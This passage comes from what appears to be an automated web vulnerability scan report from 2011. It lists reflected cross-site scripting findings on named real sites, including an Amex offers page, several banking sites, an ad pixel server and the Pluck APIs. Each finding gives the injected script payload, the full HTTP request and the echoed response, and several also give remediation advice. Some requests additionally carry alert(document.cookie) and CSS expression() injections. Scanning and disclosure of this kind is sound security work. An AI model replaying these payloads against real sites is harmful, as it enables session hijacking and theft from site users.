.do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_prop82cc0";alert(1)//5ac35aa2ed1&popup=true&offerId=<offerId>
...[SNIP]...

1.417. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a13"><script>alert(1)</script>8d46a60ecb1 was submitted in the issuerName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:27:34 GMT
Date: Thu, 03 Feb 2011 14:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 291329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
<a href="/selects/us?issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1">
...[SNIP]...

1.418. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae6e'%3balert(1)//ad3a1fe5923 was submitted in the issuerName parameter. This input was echoed as bae6e';alert(1)//ad3a1fe5923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_propbae6e'%3balert(1)//ad3a1fe5923&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:29:41 GMT
Date: Thu, 03 Feb 2011 14:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 287293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
.do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_propbae6e';alert(1)//ad3a1fe5923',
    {
               method:'GET',
               onComplete:parseXml
           });
}
function parseXml(response)
{
var responseXml = response.responseXML;
//alert(responseXml);
var m
...[SNIP]...

1.419. http://onlinecheckingsbanking.com/ [adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The value of the adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4a7"><script>alert(1)</script>c726bd08fb8 was submitted in the adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=947b717b071dadc68ba7dd3e56fcdf06; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 721
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8" "frameborder=0"/>
...[SNIP]...

1.420. http://onlinecheckingsbanking.com/ [keyword parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8916"><script>alert(1)</script>2d8d0fb1f0b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:45 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d460c720f7cd5ee81d00c4a5c9da894f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 714
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058" "frameborder=0"/>
...[SNIP]...

1.421. http://onlinecheckingsbanking.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b820e"><script>alert(1)</script>6f57152ba82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=cf6aa261be55b78f06bd6404dc8b066c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 733
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1" "frameborder=0"/>
...[SNIP]...

1.422. http://peoplesbank.com/search.php [term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesbank.com
Path:   /search.php

Issue detail

The value of the term request parameter is copied into the HTML document as plain text between tags. The payload 9183b<script>alert(1)</script>6fd4fa2c65b was submitted in the term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?d=peoplesbank.com&cachekey=1296747318&rc=true&term=Internet+banking9183b<script>alert(1)</script>6fd4fa2c65b&append= HTTP/1.1
Host: peoplesbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n94u5lhrbr0a5c7as50gdp2tc0;

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Cache-Control: no-cache
Content-type: text/html
Connection: close
Date: Thu, 03 Feb 2011 15:41:42 GMT
Server: lighttpd
Content-Length: 18861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="au
...[SNIP]...
<span class="searchedfor">INTERNET BANKING9183B<SCRIPT>ALERT(1)</SCRIPT>6FD4FA2C65B</span>
...[SNIP]...

1.423. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346ad'%3balert(1)//f0a82ea655a was submitted in the admeld_callback parameter. This input was echoed as 346ad';alert(1)//f0a82ea655a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match346ad'%3balert(1)//f0a82ea655a HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; subID="{}"; dp_rec="{\"1\": 1296659838+ \"3\": 1296659629+ \"2\": 1296508071+ \"4\": 1296660699}"; partnerUID="eyI4NCI6IFsiRFRRa2U3VDk5OVk0cVlKQiIsIHRydWVdfQ=="; segments="3391|13746|3392|23864|11262|11265|30353|7775|17277|3425|38781|38582,1298044270|27273|40657|24085|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 03 Feb 2011 19:02:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 03-Feb-2011 19:02:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 368

document.write('<img width="0" height="0" src="http://tag.admeld.com/match346ad';alert(1)//f0a82ea655a?admeld_adprovider_id=300&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1297191762&custom_user_segments=%2C3391%2C13746%2C3392%2C23864%2C11262%2C11265%2C30353%2C7775%2C17277%2C3425%2
...[SNIP]...

1.424. http://pluck.local.com/ver1.0/daapi2.api [jpcb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.local.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload d5e7e<script>alert(1)</script>1fda4ce402e was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcbd5e7e<script>alert(1)</script>1fda4ce402e&jpctx=request_0 HTTP/1.1
Host: pluck.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Thu, 03 Feb 2011 16:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Date: Thu, 03 Feb 2011 16:08:27 GMT
Content-Length: 91

PluckSDKjpcbd5e7e<script>alert(1)</script>1fda4ce402e({
"Envelopes": []
},'request_0');

1.425. http://pluck.local.com/ver1.0/daapi2.api [jpctx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.local.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpctx request parameter is copied into a single-quoted JavaScript string literal that is passed as the second argument of the JSONP callback (the ,'request_0...') at the end of the response), and the response is served as application/x-javascript. The payload fa896<script>alert(1)</script>11222906e44 was submitted in the jpctx parameter and was echoed unmodified in the application's response.

The scanner's payload contains no single quote, so in the response it stays inside the string literal, and the <script> tag would only be interpreted if the browser rendered the response as HTML. The context visible in the response is one where a single quote in jpctx would close the literal; that is the check to make when triaging this finding. The fix is to serialize jpctx as a JSON string rather than concatenate it between quotes.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_0fa896<script>alert(1)</script>11222906e44 HTTP/1.1
Host: pluck.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Thu, 03 Feb 2011 16:08:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Date: Thu, 03 Feb 2011 16:08:45 GMT
Content-Length: 91

PluckSDKjpcb({
"Envelopes": []
},'request_0fa896<script>alert(1)</script>11222906e44');

1.426. http://pluckit.demandmedia.com/requests [apiKey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the apiKey request parameter is copied into the message field of a JSON-encoded error envelope inside the JSONP response ("Unknown customer: ..."), which is served as application/json. The payload 3767e<script>alert(1)</script>480207bdcb8 was submitted in the apiKey parameter and was echoed unmodified in the application's response.

In the response the payload sits inside a JSON string value, so it does not break out of the JavaScript; the proof of concept executes only if a browser renders the response body as HTML. Reflecting the supplied key back in an error message is unnecessary in any case, and the JSON output should escape < and > (as \u003c and \u003e) and be served with X-Content-Type-Options: nosniff.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 920
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:22 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:22 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorResponse\",\"isError\":true,\"TTL\":0,\"requestedBy\":\"\",\"message\":\"Unknown customer: c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8\",\"id\":\"4744580d-ffc5-418f-8c03-776a210129be\"}"},{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorResponse\",\"isError\":true,\"TTL\"
...[SNIP]...

1.427. http://pluckit.demandmedia.com/requests [jsonpCallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the jsonpCallback request parameter is used as the JSONP callback name and is copied unmodified into the start of the response body. The response carries Content-Type: application/json even though its body is JavaScript. The payload 546ff<script>alert(1)</script>aa268e625b5 was submitted in the jsonpCallback parameter and was echoed unmodified in the application's response.

This proof of concept demonstrates that the callback name is not validated. The legitimate value in this request, dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback, shows the grammar an allowlist has to accept (identifiers, dotted members and a quoted bracket key); anything outside that grammar should be rejected with an error, and the response should be served as application/javascript with X-Content-Type-Options: nosniff.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
